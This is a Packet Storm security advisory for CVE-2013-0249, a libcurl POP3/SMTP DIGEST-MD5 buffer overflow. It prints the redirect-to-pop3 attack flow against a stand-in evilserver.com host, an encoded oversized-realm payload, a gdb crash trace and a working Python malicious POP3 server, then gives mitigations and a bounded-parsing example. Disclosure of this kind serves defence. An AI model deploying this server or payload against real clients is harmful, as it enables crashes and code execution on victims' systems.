cURL Buffer Overflow

08 Feb 2013 00:00:00 · Reported by Volema · Type: packetstorm · Source: packetstormsecurity.com

cURL Buffer Overflow with Remote Code Execution

cURL buffer overflow  
Wed 06 February 2013  
  
Volema found a remotely exploitable buffer overflow vulnerability in the libcurl POP3 and SMTP protocol handlers which leads to code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided by the server without doing the proper length checks, and that data is then appended to a local fixed-size buffer on the stack.  
  
Vendor notified, CVE-2013-0249 released.  
  
Attack Concept Outline  
  
We have permission to send custom HTTP requests with curl. We send a request to our server http://evilserver.com/  
  
GET / HTTP/1.0  
Host: evilserver.com  
  
The server answers with  
  
HTTP/1.0 302 Found  
Location: pop3://x:[email protected]/.  
  
"Smart" curl interprets the redirect and connects to evilserver.com port 110/TCP using the POP3 protocol. The server answers  
  
+OK POP3 server ready  
  
curl sends  
  
CAPA  
  
The server answers with DIGEST-MD5 as the only capability  
  
+OK List of capabilities follows  
SASL DIGEST-MD5  
IMPLEMENTATION dumbydumb POP3 server  
  
so libcurl has to send  
  
AUTH DIGEST-MD5  
  
then the server sends the payload  
  
+ cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=  
  
and the overflow happens because of the fixed realm buffer size; decoded, the challenge is  
  
realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8  
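An added example of the kind of length check the advisory says was missing, written for this page and not taken from libcurl (the 128-byte buffer size and the helper names are assumptions): a bounded key/value extractor that refuses the oversized realm above instead of copying it onto the stack.

```c
#include <stdio.h>
#include <string.h>

/* Size of the fixed realm buffer described in the advisory; the value is
 * assumed for this illustration, this is not curl's code. */
#define REALM_MAX 128

/* Copy the quoted value of key="..." from a decoded DIGEST-MD5 challenge
 * into out (capacity outlen). Returns 1 on success, 0 if the key is missing,
 * the value is unterminated, or it would not fit. An oversized server-supplied
 * value is refused instead of being written past the end of the buffer. */
static int get_quoted_value(const char *chlg, const char *key,
                            char *out, size_t outlen)
{
    char pat[32];
    const char *start, *end;
    size_t len;

    if (snprintf(pat, sizeof pat, "%s=\"", key) >= (int)sizeof pat)
        return 0;
    start = strstr(chlg, pat);
    if (!start)
        return 0;
    start += strlen(pat);
    end = strchr(start, '"');
    if (!end)
        return 0;                       /* unterminated value */
    len = (size_t)(end - start);
    if (len >= outlen)                  /* no room for value plus NUL */
        return 0;                       /* would overflow: refuse the challenge */
    memcpy(out, start, len);
    out[len] = '\0';
    return 1;
}

/* Build the 128-'A' realm challenge from the advisory and check that it is
 * refused while a short realm parses. Returns 1 when both behave as expected. */
int demo(void)
{
    char realm[REALM_MAX], chlg[512], big[129];
    memset(big, 'A', 128);
    big[128] = '\0';
    snprintf(chlg, sizeof chlg, "realm=\"%s\",nonce=\"OA6MG9tEQGm2hh\","
             "qop=\"auth\",algorithm=md5-sess,charset=utf-8", big);
    int rejected = !get_quoted_value(chlg, "realm", realm, sizeof realm);
    int ok = get_quoted_value("realm=\"example.org\",nonce=\"x\"", "realm",
                              realm, sizeof realm) && !strcmp(realm, "example.org");
    return rejected && ok;
}
```

With the check in place a 127-byte realm still fits, while the 128-byte one from the challenge is rejected rather than truncated silently, so a caller can fail the authentication step.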
  
How it looks in gdb:  
  
Program received signal SIGSEGV, Segmentation fault.  
0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6  
(gdb) bt  
#0 0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6  
#1 0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message ()  
from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4  
#2 0x4141414141414141 in ?? ()  
...  
#1469 0x4141414141414141 in ?? ()  
#1470 0x656d616e72657375 in ?? ()  
Cannot access memory at address 0x7fff63b8b000  
  
Original exploit (pop3d.py, Python 2 as published; indentation restored):  
  
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# curl pop3 CVE-2013-0249 by Volema/MSLC

import socket
import base64

host = "localhost"
port = 110

# minimal fake POP3 server: accept one client and answer its commands
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
sock, addr = s.accept()
sock.send('+OK POP3 server ready\n')
while True:
    buf = sock.recv(1024)
    print buf
    if buf.find('USER') > -1:
        sock.send('+OK\n')
    if buf.find('PASS') > -1:
        sock.send('-ERR 999\n')
    if buf.find('CAPA') > -1:
        # advertise DIGEST-MD5 as the only SASL mechanism
        resp = '+OK List of capabilities follows\n'
        resp += 'SASL DIGEST-MD5\n'
        resp += 'IMPLEMENTATION dumbydumb POP3 server\n'
        resp += '.\n'
        sock.send(resp)
    if buf.find('QUIT') > -1:
        sock.send('+OK')
        break
    if buf.find('AUTH') > -1:
        # 128-byte realm overflows libcurl's fixed-size stack buffer
        realm = 'A'*128
        payload = 'realm="%s",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8' % realm
        resp = '+ '+base64.b64encode(payload)+'\n'
        print resp
        sock.send(resp)
sock.close()
```
  
  
Mitigation  
  
We recommend disabling protocols other than HTTP(S) in your application using the CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS options, so a redirect cannot switch curl to POP3 or SMTP. libcurl should also be updated to a fixed version.  
  
